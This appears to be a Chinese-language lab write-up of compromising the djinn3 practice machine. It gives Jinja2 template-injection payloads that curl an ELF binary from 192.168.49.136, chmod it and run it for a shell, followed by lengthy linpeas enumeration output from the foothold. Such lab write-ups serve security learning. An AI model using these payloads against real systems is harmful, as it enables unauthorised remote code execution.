PORT STATE SERVICE
22/tcp open ssh
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_http-title: Custom-ers
5000/tcp open upnp
31337/tcp open Elite
然后组合利用5000端口和31337弱口令用户密码的guest,guest进入,ssti利用os._wrap_close这个类上线。
{{().__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['__builtins__']['eval']("__import__('os').system(''curl <http://192.168.49.136/x.elf> -o /tmp/x.elf)")}}
open
Title: 14
Description: {{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('chmod 777 /tmp/x.elf').read()")}}
open
Title: 15
Description: {{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('/tmp/x.elf').read()")}}
然后5000访问上线。
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : <https://www.patreon.com/peass> |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: <https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist>
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 4.15.0-101-generic (buildd@lgw01-amd64-003) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: djinn3
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits>
Linux version 4.15.0-101-generic (buildd@lgw01-amd64-003) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic
╔══════════╣ Sudo version
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version>
Sudo version 1.8.21p2
Vulnerable to CVE-2021-4034 (polkit privesc)
╔══════════╣ PATH
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses>
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Thu Apr 21 15:42:25 IST 2022
15:42:25 up 1:11, 0 users, load average: 0.61, 0.16, 0.05
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
sed: -e expression #1, char 379: unknown option to `s'
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
OLDPWD=/opt/.web
HISTSIZE=0
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed>
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ <https://github.com/mzet-/linux-exploit-suggester>
sed: -e expression #1, char 27: unknown option to `s'
╔══════════╣ Executing Linux Exploit Suggester 2
╚ <https://github.com/jondonas/linux-exploit-suggester-2>
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/lxc
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: <https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes>
root 1 0.0 0.8 77664 8840 ? Ss 14:30 0:01 /sbin/init
root 486 0.0 1.4 94868 14528 ? S<s 14:31 0:00 /lib/systemd/systemd-journald
root 496 0.0 0.1 97708 1728 ? Ss 14:31 0:00 /sbin/lvmetad -f
root 509 0.0 0.6 47504 6464 ? Ss 14:31 0:00 /lib/systemd/systemd-udevd
systemd+ 540 0.0 0.3 141936 3248 ? Ssl 14:31 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
systemd+ 585 0.0 0.5 70640 5056 ? Ss 14:31 0:00 /lib/systemd/systemd-resolved
root 605 0.0 0.9 91156 9900 ? Ss 14:31 0:00 /usr/bin/VGAuthService
root 606 0.0 0.7 227048 7544 ? S<sl 14:31 0:03 /usr/bin/vmtoolsd
root 607 0.0 0.1 604824 1820 ? Ssl 14:31 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 608 0.0 0.3 31320 3196 ? Ss 14:31 0:00 /usr/sbin/acron -f
root 1778 0.0 0.3 58792 3284 ? S 15:36 0:00 _ /usr/sbin/CRON -f
saint 1779 0.0 0.0 4628 852 ? Ss 15:36 0:00 | _ /bin/sh -c /usr/bin/python3 /home/saint/.sync-data/syncer.py
saint 1780 0.0 2.7 87180 27684 ? S 15:36 0:00 | _ /usr/bin/python3 /home/saint/.sync-data/syncer.py
root 1813 0.0 0.3 58792 3284 ? S 15:39 0:00 _ /usr/sbin/CRON -f
saint 1814 0.0 0.0 4628 856 ? Ss 15:39 0:00 | _ /bin/sh -c /usr/bin/python3 /home/saint/.sync-data/syncer.py
saint 1815 0.0 2.7 87180 27748 ? S 15:39 0:00 | _ /usr/bin/python3 /home/saint/.sync-data/syncer.py
root 1946 0.0 0.3 58792 3284 ? S 15:42 0:00 _ /usr/sbin/CRON -f
saint 1947 0.0 0.0 4628 812 ? Ss 15:42 0:00 _ /bin/sh -c /usr/bin/python3 /home/saint/.sync-data/syncer.py
saint 1948 0.8 2.7 87180 27568 ? S 15:42 0:00 _ /usr/bin/python3 /home/saint/.sync-data/syncer.py
www-data 612 0.0 2.7 309676 27856 ? Ssl 14:31 0:01 /usr/bin/python3 webapp.py
www-data 1828 0.0 0.0 4628 848 ? S 15:41 0:00 _ /bin/sh -c /tmp/x.elf
www-data 1829 0.0 0.0 4628 876 ? S 15:41 0:00 _ //bin/sh
www-data 1831 0.0 0.2 5484 2688 ? S 15:41 0:00 _ /bin/sh ./linpeas.sh
www-data 4925 0.0 0.0 5484 952 ? S 15:42 0:00 _ /bin/sh ./linpeas.sh
www-data 4929 0.0 0.3 36840 3324 ? R 15:42 0:00 | _ ps fauxwww
www-data 4928 0.0 0.0 5484 952 ? S 15:42 0:00 _ /bin/sh ./linpeas.sh
message+ 613 0.0 0.4 50044 4376 ? Ss 14:31 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
syslog 620 0.0 0.4 267272 5044 ? Ssl 14:31 0:00 /usr/sbin/rsyslogd -n
root 621 0.0 0.6 287548 6976 ? Ssl 14:31 0:00 /usr/lib/accountsservice/accounts-daemon[0m
root 622 0.0 0.5 62144 5736 ? Ss 14:31 0:00 /lib/systemd/systemd-logind
daemon[0m 624 0.0 0.2 28332 2508 ? Ss 14:31 0:00 /usr/sbin/atd -f
root 626 0.0 1.7 170396 17164 ? Ssl 14:31 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 636 0.0 2.0 187244 20196 ? Ssl 14:31 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 671 0.0 0.6 288884 6600 ? Ssl 14:31 0:00 /usr/lib/policykit-1/polkitd --no-debug
www-data 672 0.0 0.4 55696 4944 ? Ss 14:31 0:01 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
root 898 0.0 0.5 72300 5756 ? Ss 14:33 0:00 /usr/sbin/sshd -D
root 941 0.0 0.1 16180 1976 tty1 Ss+ 14:33 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 948 0.0 0.2 24188 2612 ? Ss 14:33 0:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
www-data 1527 0.0 0.3 21340 3596 ? Ss 14:50 0:00 _ /bin/bash /opt/.tick-serv/tickets.sh
www-data 1528 0.0 1.2 48068 13092 ? S 14:50 0:00 _ python3 /opt/.tick-serv/tickets.py
systemd+ 1175 0.0 0.5 71864 5468 ? Ss 14:33 0:00 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes>
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory>
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs>
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 6 Jun 1 2020 /etc/cron.allow
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 May 6 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 589 Mar 7 2018 mdadm
-rw-r--r-- 1 root root 191 May 6 2020 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Jun 1 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 376 Nov 20 2017 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 3 2017 dpkg
-rwxr-xr-x 1 root root 338 Jan 19 2017 lighttpd
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Mar 7 2018 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Jul 12 2013 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 5 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 5 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 May 6 2020 .
drwxr-xr-x 94 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 211 Jul 12 2013 update-notifier-common
saint
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
╔══════════╣ Systemd PATH
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths>
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Analyzing .service files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#services>
You can't write on systemd PATH
╔══════════╣ System timers
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers>
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2022-04-21 23:24:28 IST 7h left Thu 2022-04-21 14:33:30 IST 1h 8min ago apt-daily.timer apt-daily.service
Fri 2022-04-22 06:45:59 IST 15h left Thu 2022-04-21 14:33:31 IST 1h 8min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Fri 2022-04-22 10:02:51 IST 18h left Thu 2022-04-21 14:33:26 IST 1h 9min ago motd-news.timer motd-news.service
Fri 2022-04-22 14:46:19 IST 23h left Thu 2022-04-21 14:46:19 IST 56min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2022-04-25 00:00:00 IST 3 days left Thu 2022-04-21 14:33:26 IST 1h 9min ago fstrim.timer fstrim.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
╔══════════╣ Analyzing .timer files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers>
╔══════════╣ Analyzing .socket files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets>
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets>
/run/acpid.socket
└─(Read Write)
/run/dbus/system_bus_socket
└─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
└─(Read Write)
/run/snapd.socket
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/lib/lxd/unix.socket
/var/run/dbus/system_bus_socket
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus>
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( <policy user="dnsmasq">)
╔══════════╣ D-Bus Service Objects list
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus>
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 585 systemd-resolve systemd-resolve :1.0 systemd-resolved.service - -
:1.2 1 systemd root :1.2 init.scope - -
:1.21 7716 busctl www-data :1.21 web.service - -
:1.3 622 systemd-logind root :1.3 systemd-logind.service - -
:1.4 621 accounts-daemon[0m root :1.4 accounts-daemon.service - -
:1.5 671 polkitd root :1.5 polkit.service - -
:1.6 636 unattended-upgr root :1.6 unattended-upgrades.se…ce - -
:1.7 626 networkd-dispat root :1.7 networkd-dispatcher.se…ce - -
:1.9 1175 systemd-network systemd-network :1.9 systemd-networkd.service - -
com.ubuntu.LanguageSelector - - - (activatable) - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
io.netplan.Netplan - - - (activatable) - -
org.freedesktop.Accounts 621 accounts-daemon[0m root :1.4 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 671 polkitd root :1.5 polkit.service - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 622 systemd-logind root :1.3 systemd-logind.service - -
org.freedesktop.network1 1175 systemd-network systemd-network :1.9 systemd-networkd.service - -
org.freedesktop.resolve1 585 systemd-resolve systemd-resolve :1.0 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.2 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
djinn3
127.0.0.1 localhost
127.0.1.1 beginnen
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.136.102 netmask 255.255.255.0 broadcast 192.168.136.255
ether 00:50:56:ba:26:ff txqueuelen 1000 (Ethernet)
RX packets 21032 bytes 4631479 (4.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17598 bytes 6834221 (6.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 726 bytes 58491 (58.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 726 bytes 58491 (58.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports>
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 612/python3
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#users>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid>
╔══════════╣ Checking sudo tokens
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens>
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2>
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
jack:x:1001:1003:,,,:/home/jack:/bin/bash
mzfr:x:1002:1004:,,,:/home/mzfr:/bin/bash
root:x:0:0:root:/root:/bin/bash
saint:x:1000:1002:,,,:/home/saint:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(saint) gid=1002(saint) groups=1002(saint)
uid=1001(jack) gid=1003(jack) groups=1003(jack)
uid=1002(mzfr) gid=1004(mzfr) groups=1004(mzfr)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Login now
15:42:31 up 1:11, 0 users, load average: 0.56, 0.16, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
reboot system boot Tue Feb 15 17:22:50 2022 still running 0.0.0.0
wtmp begins Tue Feb 15 17:22:50 2022
╔══════════╣ Last time logon each user
Username Port From Latest
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler
/usr/bin/gcc
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 14 2020 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 May 16 2020 /etc/ldap
╔══════════╣ Searching ssl/ssh files
find: './netplan_uktfyc44': Permission denied
find: './systemd-private-a105b93e763444829709527c62b38db6-systemd-resolved.service-XxzxH4': Permission denied
find: './vmware-root_606-2722828934': Permission denied
find: './netplan_95emtdac': Permission denied
find: './systemd-private-a105b93e763444829709527c62b38db6-systemd-timesyncd.service-BHH9q6': Permission denied
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/pollinate/entropy.ubuntu.com.pem
1831PSTORAGE_CERTSBIN
gpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent'
gpg-connect-agent: failed to create temporary file '/var/www/.gnupg/.#lk0x000056366d2132f0.djinn3.8184': No such file or directory
gpg-connect-agent: can't connect to the agent: No such file or directory
gpg-connect-agent: error sending standard options: No agent running
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 1 2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Feb 10 2018 /etc/pam.d/sshd
╔══════════╣ Searching tmux sessions
╚ <https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions>
tmux 2.6
/tmp/tmux-33
